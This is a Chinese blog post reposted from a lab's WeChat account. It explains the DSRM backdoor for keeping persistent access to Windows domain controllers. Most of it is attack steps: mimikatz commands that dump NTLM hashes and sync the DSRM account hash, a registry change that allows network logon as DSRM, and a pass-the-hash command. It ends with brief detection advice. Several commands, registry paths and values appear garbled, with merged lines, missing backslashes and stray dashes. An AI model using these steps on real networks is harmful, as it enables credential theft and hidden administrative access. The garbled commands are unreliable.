以下内容,均为文章作者原创,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,长白山攻防实验室以及文章作者不承担任何责任。
长白山攻防实验室拥有该文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的副本,包括版权声明等全部内容。声明长白山攻防实验室允许,不得任意修改或增减此文章内容,不得以任何方式将其用于商业目的。
目录服务恢复模式(DSRM,Directory Services Restore Mode),是Windows服务器域控制器的安全模式启动选项。
域控制器的本地账户也就是DSRM账户,DSRM密码是在DC创建时设置的,一般很少更改。DSRM允许管理员用来修复或还原修复或重建活动目录数据库。如果DSRM密码忘了,可以使用命令行工具NTDSUtil进行更改。
DSRM 对域环境的持久化操作目前只能在安装KB96-1320的windows -server2008及以后版本,windows server2003 不能使用此方法。
每个域控制器都有本地管理员账号和密码(与域管理员账号和密码不同)。DSRM 账号可以作为一个域控制器的本地管理员用户,通过网络连接域控制器,进而控制域控制器。
使用 mimikatz 查看域内用户test的 NTLM hash,在域控制器中打开 mimikatz,分别输入如下命令:
mimikatz privilege::debugmimikatz lsadump::lsa /patch /name:tes
在域控制器中打开 mimikatz,分别输入如下命令:
mimikatz lsadump::sam(前提条件需要提高注册表的权限:注册表——编辑——权限——选择Administrator——勾选完全控制)
本地管理员账号也就是 DSRM 账号的 NTLM Hash 为:
77fab6cbc3fedeefbc8941b1e067b-925
1、将DSRM账号和域内用户的NTLM Hash同步
Cmd:>sync from domain account
发现DSRM的NTLM Hash已经变成域内用户的NTLM Hash了
-
0:默认值,只有当域控制器重启并进入 DSRM 模式时,才可以使用 DSRM 管理员账号
-
1:只有当本地 AD、DS 服务停止时,才可以使用 DSRM 管理员账号登录域控制器
-
2:在任何情况下,都可以使用 DSRM 管理员账号登录域控制器
在Windows Server 2000以后的版本操作系统中,对 DSRM 使用控制台登录域控制器进行了限制。
如果要使用 DSRM 账号通过网络登录域控制器,需要将该值设置为 2。
reg add "HKLMSystemCurrentControlSetControlLsa" /f /v DsrmAdminLogonBehavior /t REG_DWORD /d 2
New-ItemProperty “hklm:systemcurrentcontrolsetcontrollsa”-name“dsrmadminlogonbehavior” -value 2 -propertyType DWORD
mimikatz privilege::debugmimikatz sekurlsa::pth /domain:域名 /user:用户名 /ntlm: 4c56fc74829fff69deb6c6135c43bf71
1、定期检查注册表中用于控制DSRM登录方式的键值
HKLMSystemCurrentControlSetControlLsaDsrmAdminLogonBehavior
3、经常检查ID 为4794的日志。尝试设置活动目录服务还原模式的管理员密码会被记录在4794日志中
https://blog.csdn.net/qq_43645782/article/details/116944258
原文始发于微信公众号(长白山攻防实验室):DSRM后门——域渗透
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
点赞
http://cn-sec.com/archives/1076202.html
复制链接
复制链接
-
左青龙
- 微信扫一扫
-
-
右白虎
- 微信扫一扫
-
评论